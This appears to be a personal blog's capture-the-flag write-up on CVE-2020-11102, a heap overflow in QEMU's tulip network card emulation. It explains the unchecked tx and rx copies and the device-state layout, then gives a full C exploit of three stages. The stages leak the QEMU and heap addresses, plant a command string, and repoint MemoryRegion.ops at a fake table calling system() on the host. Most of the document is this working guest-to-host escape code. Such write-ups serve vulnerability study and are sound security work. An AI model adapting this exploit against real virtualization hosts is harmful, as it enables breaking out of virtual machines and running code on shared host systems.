Logo xia0o0o0o

CVE-2020-11102: Escape from the Earth

April 25, 2023
7 min read
Table of Contents

CVE-2020-11102: Escape from the Earth

Introduction

I participated in the Aliyun CTF competition recently and solved an interesting challenge based on CVE-2020-11102, a vulnerability in QEMU's tulip NIC emulation that allows the guest OS to escape and execute arbitrary code on the host OS. In this article, I would like to share some details about the challenge and what I learned from it.

The vulnerability

/* CVE-2020-11102 (tx path): DMA the guest buffers described by a tx
 * descriptor into the fixed 2048-byte s->tx_frame.
 * BUG: neither s->tx_frame_len nor len1/len2 is checked against
 * sizeof(s->tx_frame), and tx_frame_len accumulates across calls, so a
 * chain of descriptors overflows tx_frame into the fields that follow
 * it in TULIPState — a heap out-of-bounds write. */
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
    /* Both lengths come straight from the guest-controlled descriptor. */
    int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
    int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;

    if (len1) {
        /* No check that tx_frame_len + len1 fits in the 2048-byte buffer. */
        pci_dma_read(&s->dev, desc->buf_addr1,
            s->tx_frame + s->tx_frame_len, len1);
        s->tx_frame_len += len1;
    }

    if (len2) {
        pci_dma_read(&s->dev, desc->buf_addr2,
            s->tx_frame + s->tx_frame_len, len2);
        s->tx_frame_len += len2;
    }
    desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

Take a look at tulip_copy_tx_buffers() first. It DMA-reads the guest data at desc->buf_addr1 into s->tx_frame + s->tx_frame_len. Notice that there is no bounds check on either s->tx_frame_len or len1, and s->tx_frame_len is increased by len1 after each copy. By submitting descriptors repeatedly, s->tx_frame_len can grow far beyond the size of tx_frame, causing a heap buffer overflow.

The same applies to tulip_copy_rx_bytes().

/* CVE-2020-11102 (rx path): copy up to rx_frame_len bytes out of
 * s->rx_frame into the guest buffers named by an rx descriptor.
 * BUG: rx_frame_len and rx_frame_size are trusted as-is; once the tx
 * overflow has corrupted them, the source pointer
 *   s->rx_frame + (s->rx_frame_size - s->rx_frame_len)
 * can point past the 2048-byte rx_frame, leaking adjacent QEMU heap
 * memory to the guest. */
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
    int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
    int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
    int len;

    if (s->rx_frame_len && len1) {
        /* Copy at most len1 bytes of whatever remains of the frame. */
        if (s->rx_frame_len > len1) {
            len = len1;
        } else {
            len = s->rx_frame_len;
        }
        pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
            (s->rx_frame_size - s->rx_frame_len), len);
        s->rx_frame_len -= len;
    }

    if (s->rx_frame_len && len2) {
        /* Same scheme for the second buffer. */
        if (s->rx_frame_len > len2) {
            len = len2;
        } else {
            len = s->rx_frame_len;
        }
        pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
            (s->rx_frame_size - s->rx_frame_len), len);
        s->rx_frame_len -= len;
    }
}

The tulip_copy_rx_bytes() function copies s->rx_frame out to desc->buf_addr1. Since there is no validation of s->rx_frame_len and s->rx_frame_size, attacker-controlled values make the source pointer walk past the end of rx_frame — an out-of-bounds read that discloses adjacent heap memory.

Exploitation

Leak something first

To leak QEMU base address and heap address we need to control s->rx_frame_size and s->rx_frame_len. Consider the following code:

/* Device state of the emulated tulip NIC (hw/net/tulip.c); the whole
 * struct is heap-allocated. Field order is what makes the bug
 * exploitable: the fixed-size tx_frame is immediately followed by
 * tx_frame_len / rx_frame_len / rx_frame_size, so the unchecked tx
 * copy overwrites them with guest-chosen values. */
typedef struct TULIPState {
    PCIDevice dev;
    MemoryRegion io;      /* the .ops pointers of these embedded      */
    MemoryRegion memory;  /* regions are the final hijack target      */
    NICConf c;
    qemu_irq irq;
    NICState *nic;
    eeprom_t *eeprom;
    uint32_t csr[16];

    /* state for MII */
    uint32_t old_csr9;
    uint32_t mii_word;
    uint32_t mii_bitcnt;

    hwaddr current_rx_desc;
    hwaddr current_tx_desc;

    uint8_t rx_frame[2048];  /* OOB-read source for the info leak */
    uint8_t tx_frame[2048];  /* OOB-write staging buffer */
    int tx_frame_len;        /* signed: a negative value makes the next */
    int rx_frame_len;        /* tx copy land *before* tx_frame          */
    int rx_frame_size;

    uint32_t rx_status;
    uint8_t filter[16][6];
} TULIPState;

The tx_frame is a fixed-size buffer of 2048 bytes. By triggering tulip_copy_tx_buffers() multiple times we overflow tx_frame and overwrite tx_frame_len, rx_frame_len and rx_frame_size, which sit directly after it in TULIPState. Then we can call tulip_copy_rx_bytes() to copy adjacent heap memory back into the guest's user space. With some calculation, we can retrieve the QEMU base address and heap address very easily.

After leaking the memory, we need to figure out how to get arbitrary code execution within the context of QEMU. This piece of code caught my attention:

/* MMIO/PIO dispatch table for the tulip device. Declared static const,
 * so the table itself sits in read-only memory; the exploit instead
 * replaces the MemoryRegion.ops *pointer* that refers to it. */
static const MemoryRegionOps tulip_ops = {
    .read = tulip_read,
    .write = tulip_write,
    .endianness = DEVICE_LITTLE_ENDIAN,
    .impl = {
        /* every access is performed as a 32-bit operation */
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

What if we could control the function pointers in tulip_ops? Unfortunately, tulip_ops is declared static const, so the table itself is not writable.

When initializing the memory region of TULIPState, the pointer to tulip_ops will be assigned to struct MemoryRegion.ops.

    memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s,
            "tulip-io", 128);
 
    memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s,
            "tulip-mem", 128);
            
/* From qemu include/exec/memory.h. Instances are embedded in the
 * heap-allocated TULIPState (s->io, s->memory), so they are reachable
 * from the tulip out-of-bounds write. */
struct MemoryRegion {
    Object parent_obj;

    /* All fields are private - violators will be prosecuted */

    /* The following fields should fit in a cache line */
    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly; /* For RAM regions */
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    bool global_locking;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;

    const MemoryRegionOps *ops;  /* <- exploit target: repoint this at a
                                  * guest-controlled fake MemoryRegionOps */
    void *opaque;                /* handed to ops->read/write; set to the
                                  * TULIPState by memory_region_init_io() */
    MemoryRegion *container;
    Int128 size;
    hwaddr addr;
    void (*destructor)(MemoryRegion *mr);
    uint64_t align;
    bool terminates;
    bool ram_device;
    bool enabled;
    bool warning_printed; /* For reservations */
    uint8_t vga_logging_count;
    MemoryRegion *alias;
    hwaddr alias_offset;
    int32_t priority;
    QTAILQ_HEAD(, MemoryRegion) subregions;
    QTAILQ_ENTRY(MemoryRegion) subregions_link;
    QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
    const char *name;
    unsigned ioeventfd_nb;
    MemoryRegionIoeventfd *ioeventfds;
};

And struct MemoryRegion lives on the heap (embedded in TULIPState), so we can overwrite struct MemoryRegion.ops with the address of tx_frame and craft a fake struct MemoryRegionOps there. Also, notice that tx_frame_len, rx_frame_len and rx_frame_size are all of type int, which means we can also write backward — before tx_frame — by overwriting these fields with a negative value.

Putting it all together

The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <unistd.h>
 
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
 
#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6
 
#if 0
 
tulip_write ->
tulip_xmit_list_update -> 
tulip_copy_tx_buffers ->         
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->
 
static uint32_t tulip_ts(TULIPState *s)
{
    return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}
 
#endif
 
/* Guest view of a tulip DMA descriptor (mirrors QEMU's layout). */
struct tulip_descriptor {
    uint32_t status;     /* ownership/completion bits (e.g. bit 31 = OWN) */
    uint32_t control;    /* buffer sizes and flags (TDES1_*/RDES1_*) */
    uint32_t buf_addr1;  /* guest-physical address of buffer 1 */
    uint32_t buf_addr2;  /* guest-physical address of buffer 2 */
};
 
int fd;
 
/* Offset of @addr within its page (the low PAGE_SHIFT bits).
 * Widened from uint32_t to uint64_t: gva_to_gpa() passes a full 64-bit
 * virtual address, which the old prototype silently truncated (harmless
 * only because the mask keeps just the low 12 bits anyway). */
uint64_t page_offset(uint64_t addr) {
    return addr & (((uint64_t)1 << PAGE_SHIFT) - 1);
}
 
uint64_t gva_to_gfn(void *addr) {
    uint64_t pme, gfn;
    size_t offset;
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}
 
/* Guest virtual -> guest physical: frame number from the pagemap plus
 * the in-page offset. Aborts if the page is not currently mapped. */
uint64_t gva_to_gpa(void *addr) {
    uint64_t frame = gva_to_gfn(addr);
    assert(frame != -1);
    return (frame << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
 
/* Read a 16-bit value from the tulip PMIO BAR at the given offset. */
uint64_t pmio_read(uint64_t port) {
    return inw(PMIO_BASE + port);
}
 
/* 16-bit port write to the PMIO BAR; note outw takes (value, port). */
void pmio_write(uint64_t port, uint64_t val) {
    uint16_t target = PMIO_BASE + port;
    outw(val, target);
}
 
/* 32-bit port write to the PMIO BAR (used for CSR accesses). */
void pmio_writel(uint64_t port, uint64_t val) {
    uint16_t target = PMIO_BASE + port;
    outl(val, target);
}
 
/*
 * Exploit driver. Three stages (guest must be root: iopl(3) and
 * pagemap PFN reads both require it):
 *
 *   stage1 -- leak: two 0x400-byte tx copies fill the 2048-byte
 *     tx_frame; a third copy overflows into the adjacent
 *     tx_frame_len/rx_frame_len/rx_frame_size fields, then the rx path
 *     copies out-of-bounds heap memory into recv_buf, from which the
 *     QEMU image base and heap base are derived.
 *
 *   stage2 -- plant: tx_frame_len is overwritten with a negative value
 *     so the next tx copy writes *before* tx_frame, placing the command
 *     string ("catflag") where it will later serve as system()'s
 *     argument.
 *
 *   stage3 -- hijack: a fake MemoryRegionOps (read/write both set to
 *     system@plt) is staged in tx_frame, tx_frame_len is pointed at
 *     MemoryRegion.ops, the ops pointer is replaced with frame_base,
 *     and the next MMIO/PIO access invokes system() on the host.
 *
 * All magic offsets (0x755f9f, 0xe11380, 2859620, 0xe0fcf0, -0x3350,
 * -0x2a28, ...) are specific to the challenge's QEMU binary.
 */
int main(int argc, char **argv) {
    printf("[*] enter stage1\n");
    int ret = 0;    // NOTE(review): unused
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }
    iopl(3);    // raw in/out port access for the pmio_* helpers

    // allocate descriptor
    struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
    struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

    char *recv_buf = malloc(0x9000);    // destination for the leaked heap bytes
    char *buf = malloc(0x1000);         // 'A' filler used to pad tx_frame
    memset(buf, 'A', 0x1000);
    memset(recv_buf, 'B', 0x9000);

    int len1 = 0x400 << 0;
    int len2 = 0 << 11;
    tx_desc->status     = (1UL << 31) | (1UL << 24);
    tx_desc->control    = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
    tx_desc->buf_addr1  = gva_to_gpa(buf);
    tx_desc->buf_addr2  = 0x180;
    printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

    // get the physical address of the descriptor
    uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
    printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

    // set CSR5_TS_SUSPENDED
    pmio_writel(CSR(6), 1u << 13); // CSR6_ST

    // set tx descriptor
    sleep(1);
    pmio_writel(CSR(4), tx_desc_gpa);   // tx_frame_len should be 0x400 now

    printf("[*] fill tx_frame\n");

    // set tx descriptor (second 0x400 copy: tx_frame is now exactly full)
    sleep(1);
    tx_desc->status     = (1UL << 31) | (1UL << 24);
    tx_desc->control    = len2 | len1 | (1UL << 24);
    tx_desc->buf_addr1  = gva_to_gpa(buf);
    tx_desc->buf_addr2  = 0x180;
    pmio_writel(CSR(4), tx_desc_gpa);   // tx_frame_len should be 0x800 now

    // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
    printf("[*] clean CSR5\n");
    pmio_writel(CSR(5), 0xffffffff);
    // Mirrors the tail of TULIPState right after tx_frame: copying
    // exactly this struct at offset 0x800 overwrites the real fields.
    struct oob_data {                   // control the following fields in TULIPState
        int tx_frame_len;
        int rx_frame_len;
        int rx_frame_size;

        uint32_t rx_status;
        uint8_t filter[16][6];
    };
    len1 = sizeof(struct oob_data);
    struct oob_data *oob_data = malloc(sizeof(struct oob_data));
    oob_data->tx_frame_len = 0x400 - len1;
    oob_data->rx_frame_len = 0x900;             // > 2048: rx copy reads past rx_frame
    oob_data->rx_frame_size = 2048*2 + 0x900;   // pushes the source pointer OOB
    for (int i = 0; i < 16; i++) {          // bypass some stuff
        oob_data->filter[i][0] = 'A';
        oob_data->filter[i][1] = 'A';
        oob_data->filter[i][2] = 'A';
        oob_data->filter[i][3] = 'A';
        oob_data->filter[i][4] = 'A';
        oob_data->filter[i][5] = 'A';
    }

    tx_desc->status     = (1UL << 31) | (1UL << 24);
    tx_desc->buf_addr1  = gva_to_gpa(oob_data);
    tx_desc->buf_addr2  = 0x180;
    tx_desc->control    = len2 | len1 | (1UL << 24) | (1UL << 30);
    pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1));         // CSR6_OM_SHIFT trigger tulip_receive

    sleep(1);
    printf("[*] OOB write tx_frame_len...\n");

    int rx_len1, rx_len2;
    rx_len1 = 0x400;
    rx_len2 = 0;
    rx_desc->status     = (1UL << 31) | (1UL << 24); // RDES0_OWN
    rx_desc->buf_addr1  = gva_to_gpa(recv_buf);
    rx_desc->buf_addr2  = 0x180;
    rx_desc->control    = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

    // set rx descriptor
    sleep(1);
    uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
    printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
    pmio_writel(CSR(3), rx_desc_gpa);

    // set tx descriptor (kicks off the OOB rx copy into recv_buf)
    sleep(1);
    pmio_writel(CSR(4), tx_desc_gpa);

    printf("[+] leak\n");
    // Dump the leaked bytes; the interesting qwords were located by
    // inspecting this output against the challenge binary.
    char *cur = (char *)recv_buf;
    for (int i = 0; i < 50; ++i) {
        printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
        cur += 16;
    }
    cur = (char *)recv_buf;
    // Binary-specific offsets: qword 0x1d is a .text pointer, qword 22
    // is a heap pointer (values found empirically for this build).
    uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
    uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
    uint64_t qemu_plt_system = qemu_base+2859620;   // system@plt
    uint64_t frame_base = heap_base+0xe0fcf0;       // where tx_frame lives on the heap
    printf("[*] continue...\n");
    printf("[+] qemu_base: 0x%lx\n", qemu_base);
    printf("[+] heap_base: 0x%lx\n", heap_base);

    printf("[*] enter stage2\n"); {

        // Same fill sequence as stage1 to get tx_frame_len to 0x800.
        len1 = 0x400 << 0;
        len2 = 0 << 11;
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->control    = len2 | len1 | (1UL << 29) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(buf);
        tx_desc->buf_addr2  = 0x180;
        printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

        uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
        printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

        // CSR5_TS_SUSPENDED
        pmio_writel(CSR(6), 1u << 13); // CSR6_ST

        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);

        printf("[*] fill tx_frame\n");

        // set tx descriptor
        sleep(1);
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->control    = len2 | len1 | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(buf);
        tx_desc->buf_addr2  = 0x180;
        pmio_writel(CSR(4), tx_desc_gpa);

        // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
        printf("[*] clean CSR5\n");
        pmio_writel(CSR(5), 0xffffffff);

        len1 = sizeof(struct oob_data);
        struct oob_data *oob_data = malloc(sizeof(struct oob_data));
        // Negative tx_frame_len: the next copy lands *before* tx_frame
        // (binary-specific distance to the command-string location).
        oob_data->tx_frame_len = -0x3350 - 0x70;
        oob_data->rx_frame_len = 0;
        oob_data->rx_frame_size = 0;
        for (int i = 0; i < 16; i++) {          // bypass some stuff
            oob_data->filter[i][0] = 0xff;
            oob_data->filter[i][1] = 0xff;
            oob_data->filter[i][2] = 0xff;
            oob_data->filter[i][3] = 0xff;
            oob_data->filter[i][4] = 0xff;
            oob_data->filter[i][5] = 0xff;
        }

        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(oob_data);
        tx_desc->buf_addr2  = 0x180;
        tx_desc->control    = len2 | len1 | (1UL << 24);
        pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // trigger tulip_tx

        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);

        sleep(1);
        // Write the NUL-terminated command at the negative offset.
        uint64_t *binsh = (uint64_t *)malloc(0x200);
        binsh[0] = 7449354444534473059; // catflag
        binsh[1] = 0;
        len1 = 16;
        len2 = 0;
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(binsh);
        tx_desc->buf_addr2 = 0x180;
        tx_desc->control = len2 | len1 | (1UL << 24);
        pmio_writel(CSR(4), tx_desc_gpa);
    }

    // now control MemoryRegion.ops
    printf("[*] enter stage3\n"); {
        // Fake MemoryRegionOps staged at the start of tx_frame:
        ((uint64_t *)buf)[0] = qemu_plt_system;   // .read
        ((uint64_t *)buf)[1] = qemu_plt_system;   // .write

        ((uint64_t *)buf)[2] = 0;
        ((uint64_t *)buf)[3] = 0;

        ((uint64_t *)buf)[4] = 2;                 // matches DEVICE_LITTLE_ENDIAN
        ((uint64_t *)buf)[5] = 0;

        ((uint64_t *)buf)[6] = 0;
        ((uint64_t *)buf)[7] = 0;

        ((uint64_t *)buf)[8] = 0x0000000400000004; // min/max access size = 4
        ((uint64_t *)buf)[9] = 0;

        ((uint64_t *)buf)[10] = 0;
        ((uint64_t *)buf)[11] = 0;
        len1 = 0x400 << 0;
        len2 = 0 << 11;
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(buf);
        tx_desc->buf_addr2 = 0x180;
        printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

        uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
        printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

        // CSR5_TS_SUSPENDED
        pmio_writel(CSR(6), 1u << 13); // CSR6_ST

        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);

        printf("[*] fill tx_frame\n");

        // set tx descriptor
        sleep(1);
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->control    = len2 | len1 | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(buf);
        tx_desc->buf_addr2  = 0x180;
        pmio_writel(CSR(4), tx_desc_gpa);

        // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
        printf("[*] clean CSR5\n");
        pmio_writel(CSR(5), 0xffffffff);

        len1 = sizeof(struct oob_data);
        struct oob_data *oob_data = malloc(sizeof(struct oob_data));
        oob_data->tx_frame_len = -0x2a28-0x70;  // now points to the MemoryRegion.ops
        oob_data->rx_frame_len = 0;
        oob_data->rx_frame_size = 0;
        for (int i = 0; i < 16; i++) {          // bypass some stuff
            oob_data->filter[i][0] = 0xff;
            oob_data->filter[i][1] = 0xff;
            oob_data->filter[i][2] = 0xff;
            oob_data->filter[i][3] = 0xff;
            oob_data->filter[i][4] = 0xff;
            oob_data->filter[i][5] = 0xff;
        }

        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(oob_data);
        tx_desc->buf_addr2  = 0x180;
        tx_desc->control    = len2 | len1 | (1UL << 24);

        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);

        sleep(1);
        printf("[*] hijack ops\n");
        // Overwrite MemoryRegion.ops with the heap address of the fake
        // table staged in tx_frame.
        uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
        fake_memory_region_ops[0] = frame_base;
        len1 = 8;
        len2 = 0;
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(fake_memory_region_ops);
        tx_desc->buf_addr2  = 0x180;
        tx_desc->control    = len2 | len1 | (1UL << 24);
        pmio_writel(CSR(4), tx_desc_gpa);

        // trigger the ops.write -> system() on the host
        pmio_writel(CSR(4), tx_desc_gpa);
    }

    return 0;
}